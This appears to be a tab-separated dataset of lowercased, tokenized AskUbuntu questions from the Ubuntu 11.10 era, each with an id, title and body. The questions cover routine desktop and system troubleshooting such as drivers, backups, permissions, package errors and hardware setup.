80829	ca n't find g++ in software center	i have a fresh install of ubuntu 11.10 and i tried to install g++ . unfortunately i did not find it in the software center . in the sources list the boxes for universe and main are checked . any suggestions or hints ? edit : as said below : i think the problem is that the software center needs some time to refresh the software sources . i did nothing and after appr . one hour every was available .
80830	black frame around screen after hdmi connection failure	i was trying to watch a movie in my computer through the tv , so i connected both with an hdmi cable . i was unable to have a successful setup ( the colors were all weird on the tv and the screen size , incorrect ) , i tried many resolutions using the nvidia-settings application and somehow my screen got framed by a black border and after that i have been unable to remove it , even after restarting the computer and not being connected to the hdmi cable anymore . i am using ubuntu 11.10 amd64 , my gpu is an nvidia geforce 8600m gt and i am using the propietary driver version 280 . the problem is due to some setting with my account only . i logged in to the guest session and the resolution is right there . also , my desktop `` thinks '' the resolution is right ( i.e . 1280x800 ) , but it must be right in another scale because there is pixel area occupied by the black frame .
80831	recommended total system backup solution	i already searched a bit around the answers here , but nothing satisfied me . i want a back-up solution that makes a total back-up , so that i can restore my ubuntu system in case of major failures , like hdd failing . as far as i can see , i have 2 choices : backing up with deja dup to an external disk . this is fine and i am already doing it , but in case my hdd fails , and i make a new ubuntu install on a new disk , will deja dup be able to restore all my settings and stuff from the backed up files ? if it can , then what other files/folders should i add in deja dup to back-up ? currently i have set only the recommended /home folder . is there a point in telling deja dup to back-up everything under `` / '' ? disk/partition cloning software . this would be something similar to norton ghost . is there software like this with a nice gui that you could recommend for ubuntu ? and even better , it would be nice if ubuntu 's livecd could recognize such a clone at install step . i am using 11.10 .
80834	is there any way to mount cifs partitions with only user permissions	i am trying to mount cifs/samba drives on an ubuntu machine . it seems as though i either need to run it under root or modify my fstab , which also requires root permissions . on mac , mount_smbfs does not require root . is there any way for a normal user to mount without requiring root to either modify the fstab or running it in ubuntu 10.04 ?
80835	ubuntu stuck at plymouth boot splash	the title says it pretty much all . this is actually quite interesting . i set the timeout in grub2 to 0s . now that ubuntu does not boot , the grub menu appears . i 've tried booting in recovery mode , but then menus appear an i can not use the keyboard . when i choose to boot normally , the boot gets stuck at the plymouth boot splash ...
80841	how to run any program but prevent it from accessing the internet	i see a nice tutorial on the subject from 2009 : http : //ubuntuforums.org/showthread.php ? t=1188099 but wanted something that will ( more likely ) work on ubuntu 11.10 . this is a flavor of an `` application firewall '' for allowing me to use windows software in wine , while keeping them at bay from `` calling base '' for collecting the user 's data ( me ) .
80845	ubuntuone does n't sync on my computer	file sync has stopped working on my computer . when i open ubuntuone i see the following error : file sync error . ( org.freedesktop.dbus.error.unknownmethod : method `` current_status '' with signature `` on interface `` com.ubuntuone.syncdaemon.status '' does n't exist ) . when i click `` reset '' nothing happens . any ideas ?
80847	oki b2540 - still does n't print ?	i 've read the item `` oki b2540 printer does n't print '' , here and elsewhere , but i still do n't know what to do , or if it is even possible !
80851	live usb not saving setting to not suspend when laptop lid is closed	i see that a similar question exists but it 's with regards to ubuntu 10.10 . i currently have ubuntu 11.10 . also , i am unsure as to whether or not the live booting would have anything to do with this issue . i have tried going to the `` power '' dialog and setting the close lid action to `` do nothing '' ( as oppose to `` suspend ) . i then close the dialog , close the lid and still ubuntu goes into suspended mode . although it seemed unlikely being that it 's a live boot , just in case , i tried rebooting after making the setting change but it still was suspending when the lid was closed .
80854	video game `` gish '' will only launch from command line	platform : lubuntu 11.10 x64 program : gish when i try to launch gish from the command line ( /opt/gish/gi.sh ) , there are no problems . but when i try to launch it from the lxde menu , it will not start . contents of /usr/share/applications/gish.desktop : [ desktop entry ] categories=game ; actiongame ; adventuregame ; arcadegame ; exec=/opt/gish/gi.sh path=/opt/gish icon=x-gish terminal=false type=application name=gish i tried changing terminal=false to terminal=true to debug it , but then i just got a blank terminal , and the game did n't start . edit : here is some additional information , as requested by eliah kagan below : i tried editing /usr/share/applications/gish.desktop , as recommended , but it had no effect however , ~/.xsession-errors contained the following error : [ : 8 : x86_64 : unexpected operator ./gish_32 : error while loading shared libraries : libgl.so.1 : wrong elf class : elfclass64 i think there 's a problem with the /opt/gish/gi.sh shell script . this is its contents : cd /opt/gish/ machine_type=`uname -m` if [ $ { machine_type } == 'x86_64 ' ] ; then ./gish_64 else ./gish_32 fi i 'm not too familiar with bash , so hopefully someone else can point out the error . i have a 64-bit machine . i think that when the script is run from the command line , it 's properly launching the 64-bit version ( /opt/gish/gish_64 ) , but when it 's run from the lxde menu , it 's launching the 32-bit version ( /opt/gish/gish_32 ) , which is causing the libgl.so.1 error . however , this may be related to my libgl.so.1 problems with 2 other games .
80856	how to make amarok `` see '' my ipod 6gen classic ?	the problem : when i mount my ipod classic , amarok will not show it , there is no devices tab , too . the system will see the ipod , though , other apps - clementine , rhythmbox will see the ipod and read it and the database correctly . i use 11.10 ubuntu , tried with live kubuntu 11.10 . any ideas how to fix it ?
80864	why does n't inkscape recognize the ubuntu color palettes ?	inkscape 0.48.2 refuses to show my newly added ubuntu color palettes in the color palettes selection menu . i have downloaded the ubuntu color palettes for gimp/inkscape from design.canonical.com , extracted the files and copied them to /usr/share/inkscape/palettes/ where all the other color palettes are . i 've even made sure that all the files have the same permissions , just in case . what am i missing ?
80866	traktor audio 2 dj soundcard configuration	i have a traktor audio 2 dj usb sound card ( the first version of what it 's now called simply traktor audio 2 ) the problem in settings it only sees one output , when there should be two ( i need that for mixxx etc . ) also i want to be able set the sample rate to one of these : 44.1 , 48 , 88.2 , 96 khz or at least check which one is set . additionally if possible setting the latency would be an advantage . some info : $ aplay -l **** list of playback hardware devices **** card 0 : hdmi [ hda ati hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : traktoraudio2 [ traktor audio 2 ] , device 0 : traktor audio 2 [ traktor audio 2 ] subdevices : 1/2 subdevice # 0 : subdevice # 0 subdevice # 1 : subdevice # 1 $ cat /proc/asound/cards 0 [ hdmi ] : hda-intel - hda ati hdmi hda ati hdmi at 0xfdcfc000 irq 45 1 [ traktoraudio2 ] : snd-usb-caiaq - traktor audio 2 native instruments traktor audio 2 ( usb-0000:00:1d.7-8 )
80869	ca n't install tiny tiny rss on x64 ubuntu server	i am having a lot of trouble installing tiny tiny rss on ubuntu 64-bit to the point where i 've almost given up . can someone please help me compile a .deb package to install tiny tiny rss onto my 64-but ubuntu server 11.04 system ? the author provides a debian package here which works great on 32-bit ubuntu , but not at all on 64-bit . i have tried installing 32-bit libraries and getlibs which did n't help , and i do n't want to chroot a 32-bit install as this will take a lot of space just for one program . so stuck : (
80873	how to prevent a gtk.sourceview from grabbing the uri of a file	i 'm making a text editor using gtk3 in vala . i need to drag a file and , when i drop it into the application window , the application opens that file . i 'm using a gtk.notebook that contains the gtk.sourceview 's . it works when i drop a file into an empty gtk.notebook , but when there is at least one gtk.sourceview 's appended on it , the sourceview grab the uri of the file , shows it and the window ca n't handle the opening of the file . in this case , what can i do to prevent a gtk.sourceview from grabbing the uri of a file when i drop a file into a gtk.sourceview . ps : i tried to use the drag_dest_unset ( ) inside the sourceview derived class . it worked , the sourceview did n't grab the uri and the window could open the file , but the application showed a message like this , in runtime : gtk-warning ** : ca n't set a target list on a widget until you 've called gtk_drag_dest_set ( ) to make the widget into a drag destination
80877	remove app shortcuts from unity ?	sorry if this has already been asked . i installed a couple of apps with wine , which i un- and then re-installed , but they still appear in the unity dash . how can i remove them ?
80879	send raw data to usb parallel port after upgrading to 11.10	i have a laser cutter connected via a generic usb to parallel adapter . the laser cutter speaks hpgl , as it happens , but since this is a laser cutter and not a plotter , i usually want to generate the hpgl myself , since i care about the ordering , speed , and direction of cuts and so on . in previous versions of ubuntu , i was able to print to the cutter by copying an hpgl file directly to the corresponding usb `` lp '' device . for example : cp foo.plt /dev/usblp1 well , i just upgraded to ubuntu 11.10 oneiric , and i ca n't find any `` lp '' devices in /dev anymore . d'oh ! what 's the preferred way to send raw data to a parallel port in ubuntu ? i 've tried system settings > printing > + add , hoping that i might be able to associate my device with some kind of `` raw printer '' driver and print to it with a command like lp -d lasercutter foo.plt but my usb to parallel adapter does n't seem to show up in the list . what i do see are my hp color laserjet , two usb-to-serial adapters , `` enter uri '' , and `` network printer '' . meanwhile , over in /dev , i do see /dev/ttyusb0 and /dev/ttyusb1 devices for the 2 usb-to-serial adapters . i do n't see anything obvious corresponding to the hp printer ( which was /dev/usblp0 prior to the upgrade ) , except for generic usb stuff . for example , sudo find /dev | grep lp produces no output . i do seem to be able to print to the hp printer just fine , though . the printer setup gui gives it a device uri starting with `` hp : '' which is n't much help for the parallel adapter . the cups administrator 's guide makes it sound like i might need to feed it a device uri of the form parallel : /dev/something , but of course if i had a /dev/something i 'd probably just go on writing to it directly . here 's what dmesg says after i disconnect and reconnect the device from the usb port : [ 924.722906 ] usb 1-1.1.4 : usb disconnect , device number 7 [ 959.993002 ] usb 1-1.1.4 : new full speed usb device number 8 using ehci_hcd and here 's how it shows up in lsusb -v : bus 001 device 008 : id 1a86:7584 qinheng electronics ch340s device descriptor : blength 18 bdescriptortype 1 bcdusb 1.10 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 8 idvendor 0x1a86 qinheng electronics idproduct 0x7584 ch340s bcddevice 2.52 imanufacturer 0 iproduct 2 usb2.0-print iserial 0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 32 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0x80 ( bus powered ) maxpower 96ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 2 binterfaceclass 7 printer binterfacesubclass 1 printer binterfaceprotocol 2 bidirectional iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0020 1x 32 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x02 ep 2 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0020 1x 32 bytes binterval 0 device status : 0x0000 ( bus powered )
80880	how can i use my usb hdd as a live installer without formatting it all ?	i have some unpartioned space on my usb hdd and i would like to use that space to setup a live ubuntu installation partition . i have a lot of data in other partitions that i want to keep , so i can not just plug in the usb creator because it seems to want to format the whole thing ... what can i do ?
80883	disable password prompt on user switch ?	i 've got 11.10 on a desktop machine with two users . both users have `` password '' set to `` not asked on login '' in users settings . at startup , either user can log in without a password . but once both users are logged in , it takes a password to switch between users . in previous ubuntus , you could override this by setting /desktop/gnome/lockdown/disable_lock_screen to true in gconf-editor . that is ignored in the gnome 3 / unity era . does anyone know a way to disable the password prompt when switching between users in oneiric ?
80889	problem connecting the second external monitor	i had a similar problem while using ubuntu 10.04 . i recently upgraded to 11.10 and when i connect the external monitor , both the screens ( laptop screen and external monitor ) goes dark and stops responding . but , individual screens work perfectly fine . i can not mirror the screen as well as it is disabled . any idea how to fix this problem ? i would like to extend my screen . thanks
80891	music stops when screen turns off	running banshee on ubuntu 11.10 with gnome 3 . music stops playing when the screen turns off ( like powersave mode / when the screensaver turns on ) when it gets to the end of the currently playing song . if i come back to the computer it will start playing again . i tried making the computer not lock in case that was the cause but it still stops playing when the screen saver comes on . besides making the screen stay on is there another solution ? thanks
80895	partial upgrade error	this is an issue i have googled a lot and i have tried a lot of fixes , but non of them really worked . at some point ( i ca n't remember when/how ) my update system sort of broke , and since then it is always complaining about `` not all updates can be installed , run a partial upgrade '' . if i click on partial upgrade , i get the following result but running apt-get install -f does not fix anything , and at the end i always get the following message funny thing is that my apt-get system works perfect on console . i can update my system through apt-get update , apt-get upgrade etc.. so.. how can i fix the graphic interface ? i understand that my apt-get system is not broken , but somehow its gui it is . any thoughts about it ? thanks ! p.d : i have already tried sudo dpkg -- configure -a and sudo apt-get autoremove edit : this is the output i get after sudo apt-get update & & sudo apt-get upgrade > dan @ dan ~ $ sudo apt-get update & & sudo apt-get upgrade ign > http : //archive.canonical.com oneiric inrelease ign > http : //security.ubuntu.com oneiric-security inrelease ign > http : //gb.archive.ubuntu.com oneiric inrelease ign > http : //gb.archive.ubuntu.com oneiric-updates inrelease ign > http : //gb.archive.ubuntu.com oneiric-backports inrelease hit > http : //archive.canonical.com oneiric release.gpg hit > http : //security.ubuntu.com oneiric-security release.gpg hit > http : //archive.canonical.com oneiric release hit > http : //gb.archive.ubuntu.com oneiric release.gpg hit > http : //gb.archive.ubuntu.com oneiric-updates release.gpg hit > http : //security.ubuntu.com oneiric-security release hit > http : //gb.archive.ubuntu.com oneiric-backports release.gpg hit > http : //gb.archive.ubuntu.com oneiric release hit > http : //archive.canonical.com oneiric/partner i386 packages ign > http : //archive.canonical.com oneiric/partner translationindex > hit http : //gb.archive.ubuntu.com oneiric-updates release > hit http : //gb.archive.ubuntu.com oneiric-backports release > hit http : //security.ubuntu.com oneiric-security/main sources > hit http : //gb.archive.ubuntu.com oneiric/main sources > hit http : //gb.archive.ubuntu.com oneiric/restricted sources > hit http : //gb.archive.ubuntu.com oneiric/universe sources > hit http : //gb.archive.ubuntu.com oneiric/multiverse sources > hit http : //gb.archive.ubuntu.com oneiric/main i386 packages > hit http : //gb.archive.ubuntu.com oneiric/restricted i386 packages > hit http : //security.ubuntu.com oneiric-security/restricted sources > hit http : //security.ubuntu.com oneiric-security/universe sources > hit http : //security.ubuntu.com oneiric-security/multiverse sources > hit http : //security.ubuntu.com oneiric-security/main i386 packages > hit http : //security.ubuntu.com oneiric-security/restricted i386 > packages hit http : //gb.archive.ubuntu.com oneiric/universe i386 > packages hit http : //gb.archive.ubuntu.com oneiric/multiverse > i386 packages hit http : //gb.archive.ubuntu.com oneiric/main > translationindex hit http : //gb.archive.ubuntu.com > oneiric/multiverse translationindex hit http : //gb.archive.ubuntu.com > oneiric/restricted translationindex hit http : //gb.archive.ubuntu.com > oneiric/universe translationindex hit http : //gb.archive.ubuntu.com > oneiric-updates/main sources hit http : //gb.archive.ubuntu.com > oneiric-updates/restricted sources hit http : //security.ubuntu.com > oneiric-security/universe i386 packages hit http : //security.ubuntu.com > oneiric-security/multiverse i386 packages hit > http : //security.ubuntu.com oneiric-security/main translationindex hit > http : //security.ubuntu.com oneiric-security/multiverse > translationindex hit http : //security.ubuntu.com > oneiric-security/restricted translationindex hit > http : //gb.archive.ubuntu.com oneiric-updates/universe sources hit > http : //gb.archive.ubuntu.com oneiric-updates/multiverse sources hit > http : //gb.archive.ubuntu.com oneiric-updates/main i386 packages hit > http : //gb.archive.ubuntu.com oneiric-updates/restricted i386 packages > hit http : //security.ubuntu.com oneiric-security/universe > translationindex hit http : //gb.archive.ubuntu.com > oneiric-updates/universe i386 packages hit > http : //gb.archive.ubuntu.com oneiric-updates/multiverse i386 packages > hit http : //gb.archive.ubuntu.com oneiric-updates/main translationindex > hit http : //gb.archive.ubuntu.com oneiric-updates/multiverse > translationindex hit http : //gb.archive.ubuntu.com > oneiric-updates/restricted translationindex hit > http : //gb.archive.ubuntu.com oneiric-updates/universe translationindex > hit http : //security.ubuntu.com oneiric-security/main translation-en > hit http : //security.ubuntu.com oneiric-security/multiverse > translation-en hit http : //gb.archive.ubuntu.com oneiric-backports/main > sources hit http : //gb.archive.ubuntu.com > oneiric-backports/restricted sources hit http : //gb.archive.ubuntu.com > oneiric-backports/universe sources hit http : //gb.archive.ubuntu.com > oneiric-backports/multiverse sources hit http : //gb.archive.ubuntu.com > oneiric-backports/main i386 packages hit http : //gb.archive.ubuntu.com > oneiric-backports/restricted i386 packages hit > http : //gb.archive.ubuntu.com oneiric-backports/universe i386 packages > hit http : //gb.archive.ubuntu.com oneiric-backports/multiverse i386 > packages hit http : //gb.archive.ubuntu.com oneiric-backports/main > translationindex hit http : //security.ubuntu.com > oneiric-security/restricted translation-en hit > http : //gb.archive.ubuntu.com oneiric-backports/multiverse > translationindex hit http : //gb.archive.ubuntu.com > oneiric-backports/restricted translationindex hit > http : //gb.archive.ubuntu.com oneiric-backports/universe > translationindex hit http : //gb.archive.ubuntu.com oneiric/main > translation-en_gb hit http : //gb.archive.ubuntu.com oneiric/main > translation-en hit http : //gb.archive.ubuntu.com > oneiric/multiverse translation-en_gb hit http : //security.ubuntu.com > oneiric-security/universe translation-en hit > http : //gb.archive.ubuntu.com oneiric/multiverse translation-en hit > http : //gb.archive.ubuntu.com oneiric/restricted translation-en_gb hit > http : //gb.archive.ubuntu.com oneiric/restricted translation-en hit > http : //gb.archive.ubuntu.com oneiric/universe translation-en_gb ign > http : //archive.canonical.com oneiric/partner translation-en_gb hit > http : //gb.archive.ubuntu.com oneiric/universe translation-en hit > http : //gb.archive.ubuntu.com oneiric-updates/main translation-en hit > http : //gb.archive.ubuntu.com oneiric-updates/multiverse translation-en > hit http : //gb.archive.ubuntu.com oneiric-updates/restricted > translation-en hit http : //gb.archive.ubuntu.com > oneiric-updates/universe translation-en hit > http : //gb.archive.ubuntu.com oneiric-backports/main translation-en ign > http : //archive.canonical.com oneiric/partner translation-en hit > http : //gb.archive.ubuntu.com oneiric-backports/multiverse > translation-en hit http : //gb.archive.ubuntu.com > oneiric-backports/restricted translation-en hit > http : //gb.archive.ubuntu.com oneiric-backports/universe translation-en > reading package lists ... done reading package lists ... done building > dependency tree reading state information ... done 0 upgraded , 0 > newly installed , 0 to remove and 0 not upgraded . dan @ dan ~ $
80896	i`ve got some problems with new acer aspire s3	i just got a new acer aspire s3 laptop , and i 've installed ubuntu on it . here is some problems : 1 . bluetooth ( ar3012 ) ca n't find any devices . rfkill shows that everything is fine , but i still ca n't connect to any device . ( maybe it was turned off in stock windows ? ) 2 . ca n't change screen brightness ( i 've tried timex 's solution with new 3.2-rc kernel and some grub options , touchpad works fine , but i still can`t use fn+right/left ) 3 . 720p video in all players ( vlc , mplayer and totem ) works wrong . i found some similar problems on intel video chips with vblank sync or something like that . video plays as it should , but i always see a line which appears on action scenes ( looks like some parts of a screen updates faster ) maybe there are some solutions from similar laptops that i can find ? ps i 've tried ubuntu 11.04 with old kernel and linux mint 12-rc with 3.2-rc2 kernel .
80897	rsync verify a file already exists in dest folder so it will skip the copy on the 1st sync	i have been looking at different tutorials about rsync about some specific situation i have . i have a home server with all my pics , this server is my backup , my pc is the one that receives the new pics and until now i had been manually copying and pasting new photos from the pc to the server . i was trying to setup rsync to do this automatically and in principle , it does without problem . now the issue ; when i fire up rsync it start copying all the files , even the ones were already in the destination ( this is because it is the 1st sync ) . so my question is : is it possible for rsync to verify that a file is the same ( name/size/bin ) so it will skip the copy on the 1st sync ?
80901	can i have a list of opened windows instead expo effect ?	when there are more than one window opened of the same aplication and i click on the icon to choose between the windows , the expo effect appears , just like the image below : but in unity 2d it gets slow , so i would like to have a list instead , something like that : is it possible ? if yes , how to do that ? thanks very much .
80902	choppy ati radeon performance multiple monitors	i am using ubuntu 11.10 . i have a ati radeon hd6850 card ( made by asus ) and 3 monitors ( dell u3011 ( 30 '' ) and 2x dell u2410 ( 24 `` ) ) . i recently upgraded to intel sandy bridge e 3930k processor and asus p9x79 pro motherboard . proprietary driver causes system hangups with the new cpu/motherboard but worked fine on my older cpu ( intel 750 ) . the opensource driver works fine with single monitor ( 30 inch ) with the new cpu . whenever i enable the second monitor , everything slows to a crawl -- typing in terminal shows a large lag . i used to use the two 24 '' monitors in potrait mode ( rotated ) with proprietary driver before . with the open source driver the rotation slows things even more . is there any fix for it . are there any tweaks to make the open source driver work better with multiple monitors with some of them rotated .
80905	my ubuntu 11.10 upgrade failed , and ubuntu is not working now	please help me in recovering ubuntu back . a fatal error occurred during 11.10 upgrade . after that my 11.04 has also crashed .
80907	when running locally , does juju use the host machine 's apt cache ?	when juju fetches packages for a unit , does it make use of the host system 's apt cache ? i 'm asking this because in my case , bandwidth is limited and i am doing some charm development . it is not really an option to have juju continuously fetching packages every time i want to test a charm . is there some way of having juju cache the packages it fetches so that it does n't have to download them all each time ?
80909	how to get fancontrol running ?	i am using fancontrol to make sure that nothing makes more noise than necessary . but since i updated to oneiric it does not work anymore . the problem is , that the hwmon devices changes any time i boot my machine , so that i have to run pwmconfig any time to get a new configuration file for fancontrol . does anybody know how to fix this ?
80914	how reinstall the default graphics drivers ?	when i installed ubuntu 11.10 , 64 bits i did n't have to install any kind of graphics drivers and all 3d efects were working fine . now , it seems to be that graphics drivers are uninstalled . i ca n't use unity 3d or any compiz effects . i have a laptop sony vaio vgn-nw330f , my graphics drivers are intel mobile 4 series chipset integrated graphic controller .
80918	hardware spec that affects the performance of octave	i am getting a new laptop . the performance of octave/matlab is affected by processor and ram ? so , may i know , which of them affect more ? the processor or the ram ? does the performance from i3 and i7 have great difference ?
80931	may not use chown to change group of a file i own	[ already solved by op : see answer . ] i had some code running on an old version of ubuntu ( karmic koala ) . machine was rebuilt to ubuntu 11.10 , and now my code falls over . it is doing the equivalent of this to change a file 's group ownership to another group which i 'm in : $ touch /tmp/new_file $ ls -la /tmp/new_file -rw-rw-r -- 1 me mygroup 0 nov 20 15:39 /tmp/new_file $ chown : anothergroup /tmp/new_file chown : changing group of `/tmp/new_file ' : operation not permitted why ca n't i change the group ownership of a file that i own ? i thought that was allowed . i am missing something . this account is a member of both groups . more info : $ umask 0002 $ chgrp anothergroup /tmp/new_file chgrp : changing group of `/tmp/new_file ' : operation not permitted $ sudo chown : anothergroup /tmp/new_file # works fine .
80937	lvm tries to de-activate in use volume at shutdown and partition alignment concerns	is it okay to have root file system on a lvm2 logical volume ? because , i always get the following error on every time i reboot or shutdown the machine . ca n't deactivate volume group `` vgsystem '' with 1 open logical volume ( s ) failed will now restart . vgsystem volume group contains two logical volumes , namely , lvroot for root file system and lvswap for swap . although , it has no effect on booting on next time , personally i don not like to see warning messages in red letters , especially the one which says failed . so can someone help me regarding this issue . in case if you want to know my partition structure , here it is ... disk /dev/sda : 247.0 gb , 246960619520 bytes 255 heads , 63 sectors/track , 30024 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0000993f device boot start end blocks id system /dev/sda1 * 1 122 975872 83 linux partition 1 does not end on cylinder boundary . /dev/sda2 122 3648 28320768 8e linux lvm /dev/sda3 3648 30025 211873792 8e linux lvm on side question : how to avoid the statement partition 1 does not end on cylinder boundary is appearing when partitioning using fdisk ( i.e . how to partition correctly so that the above statement does not appear ) thank you in advance : )
80938	is it possible to get the tux logo on the text based boot ?	on knoppix based distros , you get a nice tux logo on the left of the screen during text boot , is this possible to get on ubuntu ?
80941	how to re-enable function keys in byobu ?	i was using byobu on ubuntu 11.10 server and i needed to hit a function key in an app , so i hit f9 to bring up the config menu and switched the keybinding set from `` f-keys '' to `` screen-escape-keys '' . that worked , but now i ca n't re-enable all the f-keys . i found a program byobu-config that brings up the menu again , and i can switch back to screen keys from there . this fixes things for new screen processes , but the effect on the current screen session is weird : it disables the ctrl-a ( screen ) keys and restores f2-f8 , but f9-f12 still do n't do anything ( they 're just passed on to the foreground process ) . what 's up with this ? any ideas ? thanks in advance .
80942	pin notifications to toppanel in gnome shell ?	i just installed and enabled the gnome shell for ubuntu 11.10. its really nice except that i can not pin the notifications i want to the top panel . instead theyre on the bottom panel , normally hidden unless i mouseover . how can i pin these items to the top notification area ? and possibly remove the `` ease of access '' madness up there
80943	how to downgrade kernel	it seems that i have been affected by power regression bug . i am using ubuntu 11.10 . i want to know is there any harm in downgrading to a kernel that does not have this bug . how to downgrade the kernel ? is http : //kernel.ubuntu.com/~kernel-ppa/mainline/v2.6.39.1-oneiric/ kernel suitable for this purpose .
80953	how to connect skype with facebook	do you know how to connect skype with facebook for ubuntu user like me ? and how to do it ? like at this video
80954	how can i extract audio from mp4 or flv video files ?	is there an application that allows me to extract the audio from a mp4 or flv video file and store it as an mp3 file for use in a portable media player ?
80956	network manager forgets wireless network key	every time my computer has logged out from inactivity i have to enter the network key for my wireless network . i do n't find any `` rembember '' checkbox . is there a way to get ubuntu to remember the network key ? it sees to remember the networks itself and witch one that is preferred etc . this started when i upgraded to 11.10 , it have worked earlier .
80960	how to change bluetooth device name ?	i just ca n't figure a way to change my bluetooth device name . is there any command ?
80965	gpg : badsig error	i am getting these errors for a long time . at first they are not there . please help me ! ! ! w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //archive.canonical.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //ppa.launchpad.net oneiric release : the following signatures were invalid : badsig c2518248eea14886 launchpad vlc
80968	how can i force new windows to open in background & without focus ?	i have opera set as my default browser but it is the same for firefox . when opening a link in liferea , the link opens in an external browser and the browser gets focus . i would like to open the links in background ( so that the browser does not get focus ) . the only solution is to set focus prevention level to normal in the focus & raise behaviour tab of general options in ccsm . but this messes things for other things . do you have any other idea how to prevent new windows to have focus ? i am using unity on 11.10 .
80969	sometimes new windows do n't come to the front when launched	i 'm using gnome shell with new ubuntu for few days now and have experienced really annoying behaviour with new windows . sometimes when i use another window and press e.g . alt ctrl t to open new terminal window , i do n't get this window being brought to front . instead i get notification at the bottom that `` new terminal window is ready to use '' . the same is with pidgin being integrated with gnome shell ( via extension ) . every time i get new message , window pops up but does n't show . i need to either alt tab it or click the notification . is there any way to have new windows being always brought to front , and remove those annoying `` window is ready '' notifications ? update - gconftool-2 -- search-key focus_new_windows ( as severin asked ) : /schemas/apps/metacity/general/focus_new_windows = schema ( type : `string ' list_type : '*invalid* ' car_type : '*invalid* ' cdr_type : '*invalid* ' locale : `c ' ) /apps/metacity/general/focus_new_windows = smart
80977	how does one find out the command line corresponding to gui app ( eg , libreoffice writer ) ?	how can i run libreoffice writer from the command line ? basically , what is its command and how do i get to know what 's the command to run a particular application in general ?
80989	`` '/usr/share/app-install/desktop/software-center.menu ' : not a directory '' error when trying to reinstall the software center	i was having some problem with software center . so tried to reinstall it . but while removing it give me an error . ( reading database ... 150986 files and directories currently installed . ) removing software-center ... dpkg : error processing software-center ( -- remove ) : unable to securely remove '/usr/share/app-install/desktop/software-center.menu ' : not a directory processing triggers for man-db ... processing triggers for hicolor-icon-theme ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... errors were encountered while processing : software-center e : sub-process /usr/bin/dpkg returned an error code ( 1 ) now the same problem is repeating if i use apt-get to install or upgrade my ubuntu . i cant install any software and software-center too.. plz help
80990	how to type @ from keyboard ?	i need to know how to make @ in ubuntu with keyboard keys . in windows the keyboard keys are ctrl+alt+v but in ubuntu its different . if you know please help .
80992	ca n't drag and drop text in gedit	i 've installed gnome-shell on ubuntu 11.10 but now , when i 'm on unity , and when i drag and drop text in gedit , gedit crashes ! i 've tried to uninstall gnome-shell , but nothing changes .
80995	upgraded to 11.10 lost personal folders , ubuntu one shows no files	upgraded to 11.04 , from 10.10 system would only come up in terminal mode , but it told me that an additional upgrade was available and did i want to do that . foolishly thinking that might fix the problem , i said yes . this time it did not make it all the way through the upgrade , when i came back to the computer over an hour later , the screen was filled with an error message `` could not open display '' , had to reboot . went to recovery mode on reboot to install nvidia module , when i rebooted system came up fine , but without carrying over my personal folders , i have the home folder , but no personal named folder in it . came to ubuntu one , but gives error message ; file sync error . ( org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked is the a way around this in order to restore my files ? i know my files existed on ubuntu one as of a few months ago .
80997	how do i fix boot problems that show error `` battery state '' ?	i get an error where the monitor message says `` out of range '' ( for installed ubuntus while live dvd =o.k . ) and error `` battery state '' in addition and probably related to this : the error message `` battery state '' . there are several threads on this site , related to this problem type . so far i did not find a really case-fitting solution and with an instruction easily to reproduce .
81002	hp 625 with an ati hd4200 crashes when watching videos on websites	i have installed 11.10 on hp 625 ( graphic card ati/amd radeon hd4200 ) , everything looks normal but if i see videos on websites ( youtube , stream.cz , or similar ) , the whole ubuntu crashes . i have installed catalyst 11.11 from amd sites ( according to this http : //wiki.cchtml.com/index.php/ubuntu_oneiric_installation_guide # installing_catalyst_manually_.28from_amd.2fati.27s_site.29 ) but ubuntu still crashes . any idea how to solve this really annoying problem ?
